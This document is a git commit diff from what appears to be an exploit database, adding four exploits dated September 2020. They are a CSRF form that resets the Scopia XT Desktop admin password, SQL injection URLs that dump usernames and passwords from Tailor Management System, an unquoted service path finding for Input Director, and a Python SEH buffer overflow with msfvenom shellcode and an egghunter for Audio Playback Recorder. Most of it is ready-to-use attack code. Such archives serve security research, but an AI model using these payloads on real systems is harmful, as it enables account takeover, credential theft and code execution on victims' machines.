DB: 2020-09-10

4 changes to exploits/shellcodes Input Director 1.4.3 - 'Input Director' Unquoted Service Path Audio Playback Recorder 3.2.2 - Local Buffer Overflow (SEH) Tailor Management System - 'id' SQL Injection Scopia XT Desktop 8.3.915.4 - Cross-Site Request Forgery (change admin password)
2020-09-10 05:02:04 +00:00 · 2020-09-10 05:02:04 +00:00 · 73dd822b51
commit 73dd822b51
parent 39b0da41ed
5 changed files with 165 additions and 0 deletions
--- a/exploits/java/webapps/48798.txt
+++ b/exploits/java/webapps/48798.txt
@ -0,0 +1,29 @@
+# Exploit Title: Scopia XT Desktop 8.3.915.4 - Cross-Site Request Forgery (change admin password)
+# Google Dork: inurl:scopia+index.jsp
+# Date: 2020-09-09
+# Exploit Author: v1n1v131r4
+# Vendor Homepage: https://avaya.com
+# Software Link: https://support.avaya.com/downloads/download-details.action?contentId=C201772012204170_4&productId=P1605
+# Version: 8.3.915.4
+# Tested on: Windows 10 Pro
+# CVE : N/A
+# PoC: https://github.com/V1n1v131r4/Exploit-CSRF-on-SCOPIA-XT-Desktop-version-8.3.915.4
+
+
+# CSRF to change admin password
+# The admin password will be changed to "attacker"
+
+<!DOCTYPE html>
+<html>
+<body>
+<form method="POST" action="http://example.org:80/scopia/admin/directory_settings.jsp">
+<input type="text" name="JSESSIONID" value="">
+<input type="text" name="newadminusername" value="">
+<input type="text" name="newadminpassword" value="3B09A36C1C32CF30EB8169F43227957C">
+<input type="text" name="newenablext1000meetingpin" value="false">
+<input type="text" name="newxt1000meetingpin" value="EB8169F43227957C">
+<input type="text" name="checkstatus" value="true">
+<input type="submit" value="Send">
+</form>
+</body>
+</html>
--- a/exploits/php/webapps/48797.txt
+++ b/exploits/php/webapps/48797.txt
@ -0,0 +1,15 @@
+# Exploit Title: Tailor Management System - 'id' SQL Injection
+# Google Dork: N/A
+# Date: 2020-09-08
+# Exploit Author: mosaaed
+# Vendor Homepage: https://www.sourcecodester.com/php/14378/tailor-management-system-php-mysql.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14378&title=Tailor+Management+System+in+PHP+MySQL
+# Version: v1.0
+# Tested on: Kali linux
+# CVE: N/A
+
+
+
+http://localhost/tailor/addmeasurement.php?id=-1'+union+select+concat(username,0x3a,password),2+from+users-- -
+http://localhost/tailor/staffedit.php?id=-1'+union+select+1,2,3,concat(username,0x3a,password),5+from+users-- -
+http://localhost/tailor/staffcatedit.php?id=-3'+union+select+concat(username,0x3a,password)+from+users-- -
--- a/exploits/windows/local/48795.txt
+++ b/exploits/windows/local/48795.txt
@ -0,0 +1,37 @@
+# Exploit Title: Input Director 1.4.3 - 'Input Director' Unquoted Service Path
+# Discovery Date: 2020-09-08
+# Response from Input Director Support: 09/09/2020
+# Exploit Author: TOUHAMI Kasbaoui
+# Vendor Homepage: https://www.inputdirector.com/
+# Version: 1.4.3
+# Tested on: Windows Server 2012, Windows 10
+
+# Find the Unquoted Service Path Vulnerability:
+
+C:\wmic service get name,displayname,pathname,startmode | findstr /i "auto"
+| findstr /i /v "c:\windows\\" | findstr /i /v """
+
+Input Director Service  InputDirector  C:\Program Files
+(x86)\InputDirector\IDWinService.exe Auto
+
+# Service info:
+
+C:\sc qc IDWinService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: InputDirector
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Input
+Director\IDWinService.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Input Director Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+# Exploit:
+
+A successful attempt to exploit this vulnerability could allow executing
+code during startup or reboot with the elevated privileges.
--- a/exploits/windows/local/48796.py
+++ b/exploits/windows/local/48796.py
@ -0,0 +1,80 @@
+# Exploit Title: Audio Playback Recorder 3.2.2 - Local Buffer Overflow (SEH)
+# Date: 2020-09-08
+# Author: Felipe Winsnes
+# Software Link: https://archive.org/download/tucows_288670_Audio_Playback_Recorder/AudioRec.exe
+# Version: 3.2.2
+# Tested on: Windows 7 (x86)
+
+# Blog: https://whitecr0wz.github.io/
+# Proof of the vulnerability: https://whitecr0wz.github.io/assets/img/Findings11/11-proof.gif
+
+# Proof of Concept:
+# 1.- Run the python script, it will create the file "poc.txt" & "buf.txt".
+# 2.- Copy the content of the new file "buf.txt" to clipboard.
+# 3.- Open the application.
+# 4.- Click on the bottom-right blue button to eject.
+# 5.- Delete everything on the parameter and paste the clipboard (buf.txt). 
+# 6.- Click eject once again to close it.
+# 7.- Copy poc.txt to the clipboard.
+# 8.- Click on "Register".
+# 9.- Paste clipboard (poc.txt) on the parameter "Name".
+# 10.- Profit.
+
+import struct
+
+# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread 
+# Payload size: 447 bytes
+
+buf = b"w00tw00t"
+buf += b"\x89\xe2\xda\xd4\xd9\x72\xf4\x59\x49\x49\x49\x49\x49"
+buf += b"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37"
+buf += b"\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
+buf += b"\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
+buf += b"\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x4b\x58\x6d\x52"
+buf += b"\x63\x30\x47\x70\x63\x30\x61\x70\x6b\x39\x4a\x45\x65"
+buf += b"\x61\x4f\x30\x33\x54\x6e\x6b\x30\x50\x66\x50\x6c\x4b"
+buf += b"\x62\x72\x54\x4c\x4c\x4b\x33\x62\x32\x34\x4c\x4b\x42"
+buf += b"\x52\x64\x68\x64\x4f\x4d\x67\x42\x6a\x37\x56\x36\x51"
+buf += b"\x39\x6f\x4e\x4c\x67\x4c\x50\x61\x31\x6c\x45\x52\x36"
+buf += b"\x4c\x45\x70\x7a\x61\x78\x4f\x46\x6d\x37\x71\x4a\x67"
+buf += b"\x79\x72\x78\x72\x36\x32\x43\x67\x6e\x6b\x56\x32\x34"
+buf += b"\x50\x6e\x6b\x51\x5a\x77\x4c\x6e\x6b\x52\x6c\x74\x51"
+buf += b"\x34\x38\x49\x73\x53\x78\x67\x71\x48\x51\x30\x51\x6e"
+buf += b"\x6b\x62\x79\x37\x50\x56\x61\x6a\x73\x6c\x4b\x63\x79"
+buf += b"\x45\x48\x79\x73\x47\x4a\x42\x69\x6c\x4b\x44\x74\x6c"
+buf += b"\x4b\x56\x61\x68\x56\x76\x51\x59\x6f\x4c\x6c\x79\x51"
+buf += b"\x58\x4f\x54\x4d\x77\x71\x39\x57\x76\x58\x4b\x50\x53"
+buf += b"\x45\x38\x76\x47\x73\x71\x6d\x5a\x58\x37\x4b\x31\x6d"
+buf += b"\x46\x44\x71\x65\x4a\x44\x33\x68\x4e\x6b\x36\x38\x57"
+buf += b"\x54\x36\x61\x6a\x73\x43\x56\x6c\x4b\x54\x4c\x50\x4b"
+buf += b"\x6c\x4b\x36\x38\x57\x6c\x75\x51\x6b\x63\x4c\x4b\x45"
+buf += b"\x54\x4c\x4b\x65\x51\x6a\x70\x6f\x79\x73\x74\x57\x54"
+buf += b"\x76\x44\x33\x6b\x63\x6b\x43\x51\x72\x79\x72\x7a\x63"
+buf += b"\x61\x6b\x4f\x49\x70\x61\x4f\x63\x6f\x61\x4a\x4c\x4b"
+buf += b"\x62\x32\x4a\x4b\x4e\x6d\x73\x6d\x61\x7a\x57\x71\x6c"
+buf += b"\x4d\x4f\x75\x4c\x72\x47\x70\x65\x50\x35\x50\x56\x30"
+buf += b"\x63\x58\x50\x31\x6e\x6b\x32\x4f\x4c\x47\x49\x6f\x79"
+buf += b"\x45\x6d\x6b\x6d\x30\x47\x6d\x76\x4a\x65\x5a\x33\x58"
+buf += b"\x49\x36\x7a\x35\x6d\x6d\x4d\x4d\x49\x6f\x4e\x35\x37"
+buf += b"\x4c\x37\x76\x51\x6c\x35\x5a\x6f\x70\x6b\x4b\x4b\x50"
+buf += b"\x63\x45\x54\x45\x6f\x4b\x53\x77\x54\x53\x71\x62\x70"
+buf += b"\x6f\x50\x6a\x35\x50\x46\x33\x79\x6f\x68\x55\x31\x73"
+buf += b"\x53\x51\x70\x6c\x43\x53\x56\x4e\x62\x45\x73\x48\x71"
+buf += b"\x75\x67\x70\x41\x41"
+
+egg = ""
+egg += "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
+egg += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
+
+nseh = struct.pack("<I", 0x06710870)
+seh = struct.pack("<I", 0x10023B71)
+
+buffer = "A" * 456 + nseh + seh + "A" * 5 + egg + "\xff" * 200
+
+f = open ("poc.txt", "w")
+f.write(buffer)
+f.close()
+
+f = open ("buf.txt", "w")
+f.write(buf)
+f.close()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -10375,6 +10375,8 @@ id,file,description,date,author,type,platform,port
 42777,exploits/windows/local/42777.py,"CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode)",2017-09-23,f3ci,local,windows,
 48790,exploits/windows/local/48790.txt,"Nord VPN-6.31.13.0 - 'nordvpn-service' Unquoted Service Path",2020-09-04,chipo,local,windows,
 48794,exploits/windows/local/48794.txt,"ShareMouse 5.0.43 - 'ShareMouse Service' Unquoted Service Path",2020-09-08,alacerda,local,windows,
+48795,exploits/windows/local/48795.txt,"Input Director 1.4.3 - 'Input Director' Unquoted Service Path",2020-09-09,"TOUHAMI Kasbaoui",local,windows,
+48796,exploits/windows/local/48796.py,"Audio Playback Recorder 3.2.2 - Local Buffer Overflow (SEH)",2020-09-09,"Felipe Winsnes",local,windows,
 42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux,
 42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,
 42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,
@ -40620,6 +40622,8 @@ id,file,description,date,author,type,platform,port
 48791,exploits/multiple/webapps/48791.txt,"Cabot 0.11.12 - Persistent Cross-Site Scripting",2020-09-07,"Abhiram V",webapps,multiple,
 48792,exploits/php/webapps/48792.txt,"grocy 2.7.1 - Persistent Cross-Site Scripting",2020-09-07,"Mufaddal Masalawala",webapps,php,
 48793,exploits/java/webapps/48793.py,"ManageEngine Applications Manager 14700 - Remote Code Execution (Authenticated)",2020-09-07,Hodorsec,webapps,java,
+48797,exploits/php/webapps/48797.txt,"Tailor Management System - 'id' SQL Injection",2020-09-09,Mosaaed,webapps,php,
+48798,exploits/java/webapps/48798.txt,"Scopia XT Desktop 8.3.915.4 - Cross-Site Request Forgery (change admin password)",2020-09-09,V1n1v131r4,webapps,java,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,